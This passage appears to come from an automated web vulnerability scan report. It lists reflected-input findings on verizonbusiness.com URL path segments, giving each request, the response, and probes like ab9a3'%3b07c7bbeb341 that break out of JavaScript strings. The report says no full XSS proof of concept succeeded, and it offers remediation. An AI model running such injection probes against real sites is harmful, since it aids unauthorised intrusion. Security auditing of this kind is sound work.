The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0c81"%3bd3cdd5d87a4 was submitted in the REST URL parameter 2. This input was echoed as e0c81";d3cdd5d87a4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionse0c81"%3bd3cdd5d87a4/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41876
Date: Wed, 17 Nov 2010 00:36:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutionse0c81";d3cdd5d87a4/emergency/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.947. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/emergency/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbdab"%3baed02c97c16 was submitted in the REST URL parameter 3. This input was echoed as bbdab";aed02c97c16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/emergencybbdab"%3baed02c97c16/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:13 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43098
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/emergencybbdab";aed02c97c16/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.948. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/emergency/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba62e'%3b6702327ab2c was submitted in the REST URL parameter 3. This input was echoed as ba62e';6702327ab2c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/emergencyba62e'%3b6702327ab2c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:33 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43098
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/emergencyba62e';6702327ab2c/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.949. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/field/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82543'%3bc081d73746f was submitted in the REST URL parameter 1. This input was echoed as 82543';c081d73746f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions82543'%3bc081d73746f/bysolutions/field/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:48 GMT
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions82543';c081d73746f/bysolutions/field/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.950. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/field/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76b31"%3b6d114c17c07 was submitted in the REST URL parameter 1. This input was echoed as 76b31";6d114c17c07 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions76b31"%3b6d114c17c07/bysolutions/field/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:22 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions76b31";6d114c17c07/bysolutions/field/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEME
...[SNIP]...

1.951. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/field/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca542"%3b302e3c7c6f3 was submitted in the REST URL parameter 2. This input was echoed as ca542";302e3c7c6f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsca542"%3b302e3c7c6f3/field/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41866
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutionsca542";302e3c7c6f3/field/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMI
...[SNIP]...

1.952. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/field/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a1f9'%3b48c21336279 was submitted in the REST URL parameter 2. This input was echoed as 9a1f9';48c21336279 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions9a1f9'%3b48c21336279/field/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41866
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions9a1f9';48c21336279/field/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.953. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/field/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab9a3'%3b07c7bbeb341 was submitted in the REST URL parameter 3. This input was echoed as ab9a3';07c7bbeb341 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/fieldab9a3'%3b07c7bbeb341/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:30 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43090
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/fieldab9a3';07c7bbeb341/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.954. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/field/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6450f"%3bcf06a9b0721 was submitted in the REST URL parameter 3. This input was echoed as 6450f";cf06a9b0721 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/field6450f"%3bcf06a9b0721/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43090
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/field6450f";cf06a9b0721/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.955. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/infrastructure/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a230b"%3b3cf92047524 was submitted in the REST URL parameter 1. This input was echoed as a230b";3cf92047524 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsa230b"%3b3cf92047524/bysolutions/infrastructure/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:55 GMT
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsa230b";3cf92047524/bysolutions/infrastructure/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.956. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/infrastructure/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bc52'%3beee7272bb9e was submitted in the REST URL parameter 1. This input was echoed as 8bc52';eee7272bb9e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions8bc52'%3beee7272bb9e/bysolutions/infrastructure/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions8bc52';eee7272bb9e/bysolutions/infrastructure/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.957. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/infrastructure/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 848ca'%3bd30155e8c51 was submitted in the REST URL parameter 2. This input was echoed as 848ca';d30155e8c51 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions848ca'%3bd30155e8c51/infrastructure/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:33 GMT
Content-Type: text/html
Content-Length: 41886
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions848ca';d30155e8c51/infrastructure/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.958. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/infrastructure/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a2cd"%3b5136ad7efc was submitted in the REST URL parameter 2. This input was echoed as 5a2cd";5136ad7efc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions5a2cd"%3b5136ad7efc/infrastructure/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:09 GMT
Content-Type: text/html
Content-Length: 41884
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
